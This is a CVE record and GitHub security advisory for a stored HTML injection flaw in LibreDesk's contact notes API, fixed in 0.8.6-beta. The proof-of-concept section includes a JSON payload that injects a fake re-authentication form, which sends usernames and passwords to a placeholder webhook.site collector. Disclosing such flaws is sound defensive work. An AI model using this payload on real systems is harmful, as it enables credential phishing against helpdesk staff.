Libredesk is a self-hosted customer support desk. Prior to version 0.8.6-beta, LibreDesk is vulnerable to stored HTML injection in the contact notes feature. When adding notes via POST /api/v1/contacts/{id}/notes, the backend automatically wraps user input in <p> tags. However, by intercepting the request and removing the <p> tag, an attacker can inject arbitrary HTML elements such as forms and images, which are then stored and rendered without proper sanitization. This can lead to phishing, CSRF-style forced actions, and UI redress attacks. This issue has been patched in version 0.8.6-beta.
PUBLISHED5.2CWE-79
Improper Neutralization of HTML Tags in a Web Page in libredesk
Problem type
Affected products
abhinavxd
libredesk
< 0.8.6-beta - AFFECTED
References
https://github.com/abhinavxd/libredesk/security/advisories/GHSA-wh6m-h6f4-rjf4
https://github.com/abhinavxd/libredesk/security/advisories/GHSA-wh6m-h6f4-rjf4
https://github.com/abhinavxd/libredesk/commit/270347849943ac6a43e9fd6ebdc99c71841900eb
https://github.com/abhinavxd/libredesk/commit/270347849943ac6a43e9fd6ebdc99c71841900eb
GitHub Security Advisories
GHSA-wh6m-h6f4-rjf4
Libredesk has Improper Neutralization of HTML Tags in a Web Page
https://github.com/advisories/GHSA-wh6m-h6f4-rjf4Summary
LibreDesk is vulnerable to stored HTML injection in the contact notes feature. When adding notes via POST /api/v1/contacts/{id}/notes, the backend automatically wraps user input in <p> tags. However, by intercepting the request and removing the <p> tag, an attacker can inject arbitrary HTML elements such as forms and images, which are then stored and rendered without proper sanitization. This can lead to phishing, CSRF-style forced actions, and UI redress attacks.
Details
When notes are added through the LibreDesk web application, the client sends note content wrapped inside <p> tags. The backend appears to trust this HTML structure and stores the content as-is.
By intercepting the request to:
POST /api/v1/contacts/3/notes
and removing the <p> wrapper, an attacker can submit arbitrary HTML content. The backend does not sanitize or validate the HTML payload before persisting it.
As a result:
- Arbitrary HTML tags (e.g.,
<form>,<input>,<img>) are stored - The injected HTML is rendered when the notes are viewed in the application
- No server-side HTML sanitization or allowlisting is enforced
This indicates that the application relies on client-side HTML formatting assumptions, which can be bypassed by modifying the request.
PoC
Log in to LibreDesk and open any contact.
Add a note normally via the UI.
Intercept the request to:
POST /api/v1/contacts/3/notesOriginal request body (example):
{ "note": "<p>This is a normal note</p>" }Modify the payload by removing the
<p>tag and injecting arbitrary HTML:{ "note": "<form action='https://webhook.site/xxxx' method='POST'> <input type='text' name='username' placeholder='Username'> <input type='password' name='password' placeholder='Password'> <input type='submit' value='Re-authenticate'> </form>" }Forward the request.
View the contact note in the LibreDesk UI.
Result: The injected HTML form is rendered inside the application.
Impact
This is a stored HTML injection vulnerability affecting any user who can add or view contact notes.
Potential impact includes:
- Credential phishing through injected forms
- CSRF-style forced actions using HTML-only forms
- UI redress and social engineering
- Increased risk if notes are viewed by privileged users (e.g., admins or agents)
If the notes are shared across users or roles, this vulnerability can be abused to target multiple users, increasing severity.
JSON source
https://cveawg.mitre.org/api/cve/CVE-2025-68927Click to expand
{
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"cveMetadata": {
"cveId": "CVE-2025-68927",
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"dateUpdated": "2025-12-27T00:04:49.621Z",
"dateReserved": "2025-12-24T23:40:31.797Z",
"datePublished": "2025-12-27T00:04:49.621Z",
"state": "PUBLISHED"
},
"containers": {
"cna": {
"providerMetadata": {
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M",
"dateUpdated": "2025-12-27T00:04:49.621Z"
},
"title": "Improper Neutralization of HTML Tags in a Web Page in libredesk",
"descriptions": [
{
"lang": "en",
"value": "Libredesk is a self-hosted customer support desk. Prior to version 0.8.6-beta, LibreDesk is vulnerable to stored HTML injection in the contact notes feature. When adding notes via POST /api/v1/contacts/{id}/notes, the backend automatically wraps user input in <p> tags. However, by intercepting the request and removing the <p> tag, an attacker can inject arbitrary HTML elements such as forms and images, which are then stored and rendered without proper sanitization. This can lead to phishing, CSRF-style forced actions, and UI redress attacks. This issue has been patched in version 0.8.6-beta."
}
],
"affected": [
{
"vendor": "abhinavxd",
"product": "libredesk",
"versions": [
{
"version": "< 0.8.6-beta",
"status": "affected"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"lang": "en",
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')",
"cweId": "CWE-79",
"type": "CWE"
}
]
}
],
"references": [
{
"url": "https://github.com/abhinavxd/libredesk/security/advisories/GHSA-wh6m-h6f4-rjf4",
"name": "https://github.com/abhinavxd/libredesk/security/advisories/GHSA-wh6m-h6f4-rjf4",
"tags": [
"x_refsource_CONFIRM"
]
},
{
"url": "https://github.com/abhinavxd/libredesk/commit/270347849943ac6a43e9fd6ebdc99c71841900eb",
"name": "https://github.com/abhinavxd/libredesk/commit/270347849943ac6a43e9fd6ebdc99c71841900eb",
"tags": [
"x_refsource_MISC"
]
}
],
"metrics": [
{}
]
}
}
}